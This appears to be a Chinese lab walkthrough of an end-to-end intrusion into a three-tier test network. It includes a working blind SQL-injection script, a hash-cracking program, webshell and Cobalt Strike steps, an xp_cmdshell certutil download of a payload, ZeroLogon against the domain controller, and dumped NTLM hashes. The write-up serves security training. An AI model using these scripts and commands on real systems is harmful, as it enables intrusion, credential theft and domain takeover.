域渗透之外网打点到三层内网
文章首发于:先知社区
https://xz.aliyun.com/t/11432
环境搭建
1.项目介绍:
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。
2.VPS映射
1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini
在web1上配置frpc.ini 运行 frpc.exe -c frp.ini
成功访问到环境
http://x.x.x.x:8088/login.jsp
信息收集
1.端口探测
使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。
然后查看其详细信息。
2.网站源代码查找
发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。
然后就在github试试运气,发现了源码。
源码地址:
https://github.com/amateur-RD/netBank-System
发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。
3.SQL注入
然后进行登录测试,发现存在sql注入漏洞
网上银行系统Hsql注入漏洞
使用sqlmap不能进行跑出用户名和密码。
4.编写脚本进行sql注入
#coding:utf-8
import requests
password=""
url="http://x.x.x.x:8878/admin/login"
payload="0123456789abcdefghijklmnopqrstuvwxyz"
password=""
for i in range(1,20):
for j in payload:
exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'
or '1'='" %(i,j)
print("正在注入")
data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}
req = requests.post(url=url, data=data);
if "密码不正确" in req.text:
password+=j
break
print(password)
成功跑出密码。然后进行登录。
登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。
5.tomexam SQL注入漏洞
在另一个地址处,发现可以注册用户。然后注册用户进行登录。
登录之后发现,某处存在sql注入。
使用sqlmap进行获取用户信息。
| 1 | 1 | 1399999999 | 1 | 超级管理员 | admin | admin | 17D03DA6474CE8BEB13B01E79F789E63 | 2022-04-09 00:14:08 | 301 |
| 6 | 2 | | 1 | | eu3 | eu3 | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14
成功抓到了管理员用户和密码,然后使用md5进行解密。
成功进行登录。登录之后没有找到可getshell的地方。
6.Jspxcms-SQL注入
首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
发现先知的大佬做过找个版本的代码审计。参考链接:https://xz.aliyun.com/t/10891?page=1#toc-7。发现可以通过文件上传进行gethshell。
在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
使用sqlmap进行查找表、用户和吗密码。
成功发现了用户名和加密的密码。密码推断是明文密码+salt然后再进行md5加密。
7.编写解密脚本
通过其源码,分析其加密方式,然后编写解密脚本。
package com.jspxcms.core;
import com.jspxcms.common.security.SHA1CredentialsDigest;
import com.jspxcms.common.util.Encodes;
import java.io.File;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.PrintWriter;
import java.util.Scanner;
public class Testmain {
public static void main(String[] args)throws Exception {
byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");
SHA1CredentialsDigest test = new SHA1CredentialsDigest();
String fileName = "D:\\csdnpass.txt";
String fileName2 = "D:\\hashpassword2.txt";
try (Scanner sc = new Scanner(new FileReader(fileName))) {
while (sc.hasNextLine()) {
String line = sc.nextLine();
String encPass = test.digest(line, salt);
File f = new File(fileName2);
FileWriter fw = new FileWriter(f, true);
PrintWriter pw = new PrintWriter(fw);
pw.println(line + " " + encPass);
pw.close();
}
}
}
}
8.登录jspxcms后台getshell
使用管理员用户和解密出来的密码,成功进入管理员后台。
8.使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
9.编写目录穿越脚本
根据先知社区的大佬提出的方法,编写目录穿越脚本。
成功进行上传。
10.获取webshell
使用哥斯拉连接webshell,成功执行命令。
内网渗透:
1.frp反向代理上线CS
首先配置内网cobalt strike内网上线
在kali启动cs服务端,
查看其端口
配置frp的frps.ini信息。
2.CS上线
cs生成监听。
然后上传.exe文件进行上线。
成功上线。
3.内网信息收集
使用shell iponfig 收集信息。
根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
查看计算机名。
使用net view 查找域内其它主机,发现不能找到其他主机。
4.开启代理进行端口扫描
查看server2012的IP地址。
5.域内主机端口扫描
发现存在1433——Mysql的端口,尝试进行弱口令的暴力破解。
最好成功爆破出账号和密码.
6.mssqlclient 登录Mssql服务器
使用mysql用户和密码进行登录。
7.xp_cmshell进行getshell
help查看可以执行那些命令。
开启xp_cmdshell,然后进行信息收集。
使用certutil远程下载之前的木马,然后进行上线
xp_cmdshell certutil -urlcache -split -f http://x.x.x.x/artifact.exe c:/windows/temp/artifact.exe
8.使用SweetPotato (ms16-075)提权
上线之后,进行简单的信息收集。
然后使用第三方插件,利用SweetPotato (ms16-075)提权对其进行提权。
成功提权。
内网域渗透
1.内网域信息收集
使用net view查看域内主机。
使用hashdump进行抓取一些用户的hash值。
查看主机ip地址。
查看域控的Ip地址,和域控的计算机名。
2.ZeroLogon CVE-2020-1472 获取域控权限
编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。
将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0
3.配置代理,登录域控
配置kali的代理地址,然后进行端口扫描,测试代理是否连接。
获取域控的hash值。
Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::
然后进行登录域控。
4.PTH上线CS
关闭防火墙,利用pth进行上线cs。
成功执行命令。
生成tcp监听,然后jump到域控主机。
5.恢复密码、原hash。
恢复密码。
使用 secretsdump.py获取其hash值。
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCA
使用以下命令恢复域控密码。成功恢复其密码。
proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 fb61e3c372e666adccb7a820aa39772f
靶机到这里就结束了。
最后,成功拿下整个域控。
总结:
该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。